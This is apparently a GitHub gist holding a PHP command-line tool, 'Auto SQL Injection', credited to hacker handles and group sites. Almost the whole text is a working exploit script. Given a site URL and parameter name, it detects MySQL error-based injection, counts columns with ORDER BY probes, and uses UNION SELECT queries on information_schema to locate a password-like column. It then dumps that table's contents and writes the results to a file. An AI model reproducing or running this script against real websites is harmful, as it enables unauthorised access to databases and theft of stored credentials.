Created
June 18, 2014 18:38
-
-
Save iGh0st/b508e6ad6a763cb309c6 to your computer and use it in GitHub Desktop.
Auto SQL Injection PHP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<? | |
@set_time_limit(0) | |
@error_reporting(0) | |
if(count($argv)<=2) | |
{ | |
print(" | |
__ _ _ | |
__ __/ _\ ___ ___ _ _ _ __(_) |_ _ _ | |
\ \/ /\ \ / _ \/ __| | | | '__| | __| | | | | |
> < _\ \ __/ (__| |_| | | | | |_| |_| | | |
/_/\_\\__/\___|\___|\__,_ |_| |_|\__|\__, | | |
|___/Auto SQL Injection =D | |
#Coders : xSecurity & Mr.Dm4r | |
#Home: sec4ever.com | is-sec.com | s3c-k.com | v4-team.com | madleets.com | |
#Greets: UzunDz - b0x - Lov3rDNS - DamaneDz - rOx - r0kin Special For My Lov3r Cyber-Crystal\n"); | |
print "Usage : php {$argv[0]} site.com/file.php?id=1 id\n"; | |
die(); | |
} | |
function checke($url){ | |
$login = $url; | |
$ch = curl_init(); | |
curl_setopt($ch,CURLOPT_URL,$login); | |
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'); | |
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); | |
$result = curl_exec($ch); | |
curl_close($ch); | |
return $result; | |
} | |
$target = urldecode($argv[1]); | |
$id = $argv[2]; | |
#preg_match("#(\?)?{$id}\=([0-9]{1,6})(&)?#",$target,$m); | |
#print_r($m); | |
#exit(); | |
$test = preg_replace("#{$id}\=([0-9]{1,6})#","{$id}=$1'",$target); | |
$get = file_get_contents("{$test}"); | |
if(eregi("MySQL",$get)) | |
{ | |
echo "Infected .. Trying To Exploit\r\n"; | |
$test2 = preg_replace("#{$id}\=([0-9]{1,6})#","{$id}=$1+/*!order+by*/+1000--",$target); | |
$order1 = file_get_contents($test2); | |
if(eregi("MySQL",$order1) or eregi("'1000' in 'order",$order1)) | |
{ | |
echo "Please wite to get cals\r\n"; | |
}else{ | |
echo "Can't Get cols please test orther site\r\n"; | |
exit(); | |
} | |
for($i=1;$i<=50;$i++) | |
{ | |
echo (($i-1)==0)?"":"Col ".($i-1)."\r\n"; | |
$un .= "{$i},"; | |
$test1 = preg_replace("#{$id}\=([0-9]{1,6})#","{$id}=$1+/*!order+by*/+{$i}--",$target); | |
$order = file_get_contents($test1); | |
if(!$order) | |
{ | |
echo "Target Falied. \r\n"; | |
exit(); | |
} | |
if(eregi("MySQL",$order) or eregi("'{$i}' in 'order",$order)) | |
{ | |
$by = ($i-0); | |
echo "order by = ".($i-1)." \r\n"; | |
break; | |
} | |
} | |
$u = $by; | |
$un = preg_replace("#,{$u},#","",$un); | |
$target = preg_replace("#{$id}\=([0-9]{1,6})#","{$id}=-$1",$target); | |
$injc = preg_replace("#[0-9]{1,50}#","/*!concat(0x4d722e446d3472,column_name,0x7c3a7c,table_schema,0x7c3a7c,table_name,0x4d722e446d3472)*/",$un); | |
$url = urlencode(" /*!union select*/ {$injc} /*!from information_schema.columns where column_name like char(37, 112, 97, 115, 115, 37)*/--"); | |
$fulltarget = "{$target}{$url}"; | |
$exploit = @file_get_contents($fulltarget); | |
preg_match("#Mr.Dm4r(.*?)Mr.Dm4r#",$exploit,$m); | |
$exp = explode("|:|",$m[1]); | |
$password = (($exp[0])=="")?"0x4e6f7420466f756e64":$exp[0]; | |
$db = $exp[1]; | |
$table = $exp[2]; | |
$sqltable = bin2hex($table); | |
if($password == "0x4e6f7420466f756e64"){exit("Error");} | |
$injc2 = preg_replace("#[0-9]{1,50}#","/*!concat(0x4d722e446d3472,group_concat(column_name),0x4d722e446d3472)*/",$un); | |
$url2 = urlencode(" /*!union select*/ {$injc2} /*!from information_schema.columns where table_name=0x{$sqltable}*/--"); | |
$fulltarget2 = "{$target}{$url2}"; | |
$exploit2 = @file_get_contents($fulltarget2); | |
preg_match("#Mr.Dm4r(.*?)Mr.Dm4r#",$exploit2,$m2); | |
$m2[1] = explode(",",$m2[1]); | |
foreach($m2[1] as $tables) | |
{ | |
if($m2[1][count($m2[1])-1]==$tables) | |
{ | |
$col .= "{$tables}"; | |
}else{ | |
$col .= "{$tables},0x7c3a7c,"; | |
} | |
$cols[]=$tables; | |
} | |
$injc3 = preg_replace("#[0-9]{1,50}#","/*!concat(0x4d722e446d3472,{$col},0x4d722e446d3472)*/",$un); | |
$url3 = urlencode(" /*!union select*/ {$injc3} /*! from {$table}*/--"); | |
$fulltarget3 = "{$target}{$url3}"; | |
$exploit3 = @file_get_contents($fulltarget3); | |
preg_match("#Mr.Dm4r(.*?)Mr.Dm4r#",$exploit3,$m3); | |
$infos = explode("|:|",$m3[1]); | |
$i=0; | |
foreach($infos as $info){ | |
echo "{$cols[$i]} : {$info}\r\n"; | |
$i++; | |
} | |
file_put_contents("dd.txt",$exploit2."\r\n".$fulltarget2); | |
#print_r($m2); | |
} else { | |
echo "not infected"; | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment